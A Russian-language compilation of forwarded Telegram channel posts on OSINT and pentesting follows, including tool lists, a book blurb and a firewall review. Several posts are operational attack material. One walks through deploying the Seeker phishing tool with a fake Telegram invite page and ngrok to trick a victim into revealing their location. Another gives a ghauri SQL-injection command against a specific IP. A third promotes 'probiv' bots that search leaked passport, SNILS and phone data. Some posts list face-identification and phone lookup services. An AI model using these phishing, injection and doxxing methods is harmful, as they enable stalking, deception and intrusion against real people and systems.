Forwarded from Исследуя конкурентов
UPD: Китайский глаз бога 🔗
В прошлом году писал пост о том, что в Китае существует свой аналог телеграм-бота для поиска информации о персонах и компаниях. Как и следовало ожидать, спустя какое-то время бот перестал работать.
Думаете это остановило китайских искателей правды? Нет. Они сделали еще несколько ботов, которые выполняют те же функции. Наиболее интересным, на мой взгляд, является DingDangCats.
Интересен он из-за двух фишек:
▶️ Возможность смены языка на русский. Работать стало гараздо проще.
▶️ Реферальная программа и пополнение в USDT.
P.s. Настоятельно рекомендую не закидывать на баланс значительные суммы средств. Ребята в другой стране и что у них на уме не очень понятно.
P.s.s. Соблюдайте меры предосторожности.
Друзья, если не сложно - поставьте реакцию, это помогает продвижению канала👁
@business_cons
В прошлом году писал пост о том, что в Китае существует свой аналог телеграм-бота для поиска информации о персонах и компаниях. Как и следовало ожидать, спустя какое-то время бот перестал работать.
Думаете это остановило китайских искателей правды? Нет. Они сделали еще несколько ботов, которые выполняют те же функции. Наиболее интересным, на мой взгляд, является DingDangCats.
Интересен он из-за двух фишек:
P.s. Настоятельно рекомендую не закидывать на баланс значительные суммы средств. Ребята в другой стране и что у них на уме не очень понятно.
P.s.s. Соблюдайте меры предосторожности.
Друзья, если не сложно - поставьте реакцию, это помогает продвижению канала
@business_cons
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16
Forwarded from GitHub Community
Social-Media-OSINT-Tools-Collection — коллекция самых полезных инструментов для OSINT в социальных сетях.
4️⃣ GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from GitHub Community
Moriarty-Project — этот инструмент предоставляет информацию о введенном вами номере телефона.
4️⃣ GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Библиотека программиста
Киберщит. Искусственный интеллект и кибербезопасность
Год: 2024
#pentest #cybersec
Ежедневно в мире происходит более 2 тысяч кибератак. Кибербезопасность входит в число отраслей, которым в ближайшие 5 лет прогнозируют невероятный рост. Она обеспечивает защиту компьютерных систем, сетей, программ и данных от киберугроз (хакерских атак, вирусов, вредоносного ПО и др.). Несмотря на полезность искусственного интеллекта, не следует игнорировать факт, что технологии искусственного интеллекта и их применение могут подвергнуть организации новым, а иногда и непредсказуемым, угрозам и открыть новые возможности для злоумышленников.
В книге рассматриваются перспективы развития и проблемы применения технологий искусственного интеллекта в области кибербезопасности: повышение результативности выявления компьютерных атак, вредоносных сайтов в сети Интернет, ботов в социальных сетях, утечек конфиденциальных данных, защиты искусственного интеллекта от уязвимостей. Издание предназначено для широкого круга читателей, интересующихся вопросами кибербезопасности в современном мире.
Год: 2024
#pentest #cybersec
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Investigation & Forensic TOOLS (Beholder Is Here)
Шпаргалки BeholderIsHere pictures.pdf
3.9 MB
ПОИСК ПО ФОТО. ИНСТРУМЕНТАРИЙ:
Поисковики:
🔎images.google.com/
🔎www.bing.com/images
🔎yandex.ru/images/
🔎image.baidu.com/
🔎www.alamy.com/
🔎tineye.com/
Улучшение изображений:
Сервис для upscaling
🖥upscayl.org/
Программа для устранения размытия на фото
💻smartdeblur.net/
Выявление монтажа:
Сервис для выявления фотомонтажа
🖥https://29a.ch/photo-forensics/#forensicmagnifier
Просмотр метаданных:
💻https://hvdwolf.github.io/jExifToolGUI/
💻https://www.logipole.com/metadata++-en.htm
💻https://exifviewers.com/
Идентификация людей:
🖥facecheck.id
🖥pimeyes.com
🖥search4faces.com
Выявление стеганографии:
Выявление и маркировка изображений
«желтыми точками:
💻https://github.com/dfd-tud/deda
Поисковики:
🔎images.google.com/
🔎www.bing.com/images
🔎yandex.ru/images/
🔎image.baidu.com/
🔎www.alamy.com/
🔎tineye.com/
Улучшение изображений:
Сервис для upscaling
🖥upscayl.org/
Программа для устранения размытия на фото
💻smartdeblur.net/
Выявление монтажа:
Сервис для выявления фотомонтажа
🖥https://29a.ch/photo-forensics/#forensicmagnifier
Просмотр метаданных:
💻https://hvdwolf.github.io/jExifToolGUI/
💻https://www.logipole.com/metadata++-en.htm
💻https://exifviewers.com/
Идентификация людей:
🖥facecheck.id
🖥pimeyes.com
🖥search4faces.com
Выявление стеганографии:
Выявление и маркировка изображений
«желтыми точками:
💻https://github.com/dfd-tud/deda
👍2🔥2
Forwarded from Codeby
Seeker
Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.
Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".
🔸 Установка утилиты
🔸 Запуск
Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,
🔸 Установка ngrok
🔸 Далее создаём аккаунт и регистрируем автотокен, его можно найти у себя на аккаунте
Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.
Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.
Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 seeker.py
Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,
ngrok строго относится к тому, что на нём запускают.
Скачиваем архив и командой разорхивируем его: sudo tar -xvzf ~/Downloads/ngrok.tgz -C /usr/local/bin
ngrok config add-authtoken <token>
Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.
ngrok http 8080
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🗿3👍1
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from C.I.T. Security
http://search4faces.com/tt00
Reverse image search in database of more than 98 millions #TikTok avatars.
#oldstuff #osint #socmint
Reverse image search in database of more than 98 millions #TikTok avatars.
#oldstuff #osint #socmint
🔥2
Forwarded from GitHub Community
telegram-phone-number-checker — инструмент/скрипт Python для проверки, подключены ли номера телефонов к аккаунтам Telegram. Получение имени пользователя, имени и идентификаторов, если они доступны.
4️⃣ GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Forwarded from Codeby
В новой статье мы покажем два подхода, которые используют OSINT-специалисты для сбора информации в VK. На примере реального кейса разберём, как можно получить максимум данных, начиная с простого никнейма или фотографии.
на обновленном курсе Академии здесь
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Dark Help
✨Собрал Лучших ботов для пробива в Telegram!✨
📊sherl0ck - Бот ищет данные по: номеру, почте, ФИО, СНИЛС, ИНН, авто, IP, паспорт, Telegram, ВК, карта.📱
🔮Оракул - Самый мощный бот для пробива! Находит всё, от телефонов до соцсетей. Рекомендую приобрести подписку - идеально подходит для поиска по номеру и многому другому!💎
🔎Quick OSINT - Узнай данные человека. Первые 2 запроса бесплатно!🔥
🔎Leak OSINT - Пробный доступ на неделю для поиска по ФИО, телефону, email и паспорту. 🎁
🚓UsersBox - Надежный бот с более 17 млрд записей. Ищет по имени, email, телефону и др.🚀
💼Himera - Бот с большой базой данных для поиска по ФИО, телефону, почте, и др. Подписка стоит недешево, но базы в боте очень редкие.📈
📊FunStat - Ищет аккаунты Telegram, Находит активность, чаты, телефоны, и статистику!📱
📊sherl0ck - Бот ищет данные по: номеру, почте, ФИО, СНИЛС, ИНН, авто, IP, паспорт, Telegram, ВК, карта.📱
🔮Оракул - Самый мощный бот для пробива! Находит всё, от телефонов до соцсетей. Рекомендую приобрести подписку - идеально подходит для поиска по номеру и многому другому!💎
🔎Quick OSINT - Узнай данные человека. Первые 2 запроса бесплатно!🔥
🔎Leak OSINT - Пробный доступ на неделю для поиска по ФИО, телефону, email и паспорту. 🎁
🚓UsersBox - Надежный бот с более 17 млрд записей. Ищет по имени, email, телефону и др.🚀
💼Himera - Бот с большой базой данных для поиска по ФИО, телефону, почте, и др. Подписка стоит недешево, но базы в боте очень редкие.📈
📊FunStat - Ищет аккаунты Telegram, Находит активность, чаты, телефоны, и статистику!📱
👍8🔥4🆒1
Forwarded from Investigation & Forensic TOOLS (Beholder Is Here)
Шпаргалки BeholderIsHere email.pdf
3.9 MB
ПОИСК ПО EMAIL. ИНСТРУМЕНТАРИЙ:
Анализ заголовка письма
🖥MXToolbox.com
Сервисы поиска по утечкам сетевых сервисов.
🖥 haveibeenpwned.com
🖥 monitor.mozilla.org
🖥 intelx.io
Сервисы поиска корпоративной электронной почты.
🖥 hunter.io
🖥 www.skymem.info
Поиск в сети
💻 https://github.com/megadose/holehe
Привязка почты к интернет сервисам
🖥 www.infoga.io
информация об учетных записях по электронной почте из общедоступных источников (поисковые системы, серверы ключей PGP, Shodan)
💻 Dorks
📑site:xxxxx intext:yyyyy@yy.yy
Поиск электронной почты на страницах определенного сайта
Анализ заголовка письма
🖥MXToolbox.com
Сервисы поиска по утечкам сетевых сервисов.
🖥 haveibeenpwned.com
🖥 monitor.mozilla.org
🖥 intelx.io
Сервисы поиска корпоративной электронной почты.
🖥 hunter.io
🖥 www.skymem.info
Поиск в сети
💻 https://github.com/megadose/holehe
Привязка почты к интернет сервисам
🖥 www.infoga.io
информация об учетных записях по электронной почте из общедоступных источников (поисковые системы, серверы ключей PGP, Shodan)
💻 Dorks
📑site:xxxxx intext:yyyyy@yy.yy
Поиск электронной почты на страницах определенного сайта
👍1
Forwarded from Codeby
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
Поддерживаемые СУБД:
MySQL
Microsoft SQL Server
Postgres
Oracle
Поддерживаемые типы:
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
Добавлена поддержка:
--sql-shell --proxygit clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
Forwarded from Пентестинг. Этичный хакинг.
🔍 Инструмент для пентеста: Little Snitch – наблюдение за сетевой активностью и контроль соединений на macOS 🔍
Little Snitch – это редкий, но очень полезный инструмент для специалистов по информационной безопасности, особенно тех, кто работает на macOS. Первоначально созданный как персональный фаервол, он позволяет получать полное представление о том, какие соединения устанавливаются приложениями, и дает возможность блокировать или разрешать их в реальном времени.
🔹 Почему Little Snitch полезен для пентеста?
Мониторинг сетевой активности в реальном времени: Удобный интерфейс показывает все активные соединения и позволяет быстро реагировать на подозрительную активность.
Контроль исходящих соединений: Позволяет видеть, когда и куда отправляются данные из вашей системы. Это важно для проверки на утечки данных или активность вредоносного ПО.
Создание детализированных правил: Можно настроить правила для конкретных приложений, IP-адресов или портов, что делает инструмент очень гибким для задач мониторинга.
Уведомления о подозрительных соединениях: Little Snitch сразу сигнализирует о попытках подключения, позволяя быстро обнаруживать нетипичное поведение.
🔹 Как можно использовать Little Snitch в пентесте?
Обнаружение вредоносной активности: Выявление подозрительных соединений или программ, отправляющих данные на неизвестные серверы.
Анализ трафика при тестировании программ: Если вам нужно понять, куда и как приложение отправляет данные, Little Snitch позволит отследить эти соединения.
Поиск утечек данных: Проверка на наличие отправки конфиденциальной информации без разрешения пользователя.
Изучение поведения приложений: Понимание, какие внешние соединения инициируют приложения, позволяет выявлять зависимости и сторонние сервисы.
🔹 Пример использования:
При установке нового приложения можно использовать Little Snitch, чтобы отследить, какие запросы оно отправляет в интернет. В случае, если приложение обращается к подозрительным серверам, вы сразу получите уведомление и сможете заблокировать соединение.
Little Snitch – полезный инструмент для пентестеров, работающих на macOS, который предоставляет контроль над сетевой активностью и помогает выявлять подозрительные соединения на этапе тестирования безопасности
Little Snitch – это редкий, но очень полезный инструмент для специалистов по информационной безопасности, особенно тех, кто работает на macOS. Первоначально созданный как персональный фаервол, он позволяет получать полное представление о том, какие соединения устанавливаются приложениями, и дает возможность блокировать или разрешать их в реальном времени.
🔹 Почему Little Snitch полезен для пентеста?
Мониторинг сетевой активности в реальном времени: Удобный интерфейс показывает все активные соединения и позволяет быстро реагировать на подозрительную активность.
Контроль исходящих соединений: Позволяет видеть, когда и куда отправляются данные из вашей системы. Это важно для проверки на утечки данных или активность вредоносного ПО.
Создание детализированных правил: Можно настроить правила для конкретных приложений, IP-адресов или портов, что делает инструмент очень гибким для задач мониторинга.
Уведомления о подозрительных соединениях: Little Snitch сразу сигнализирует о попытках подключения, позволяя быстро обнаруживать нетипичное поведение.
🔹 Как можно использовать Little Snitch в пентесте?
Обнаружение вредоносной активности: Выявление подозрительных соединений или программ, отправляющих данные на неизвестные серверы.
Анализ трафика при тестировании программ: Если вам нужно понять, куда и как приложение отправляет данные, Little Snitch позволит отследить эти соединения.
Поиск утечек данных: Проверка на наличие отправки конфиденциальной информации без разрешения пользователя.
Изучение поведения приложений: Понимание, какие внешние соединения инициируют приложения, позволяет выявлять зависимости и сторонние сервисы.
🔹 Пример использования:
При установке нового приложения можно использовать Little Snitch, чтобы отследить, какие запросы оно отправляет в интернет. В случае, если приложение обращается к подозрительным серверам, вы сразу получите уведомление и сможете заблокировать соединение.
Little Snitch – полезный инструмент для пентестеров, работающих на macOS, который предоставляет контроль над сетевой активностью и помогает выявлять подозрительные соединения на этапе тестирования безопасности
👍1
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM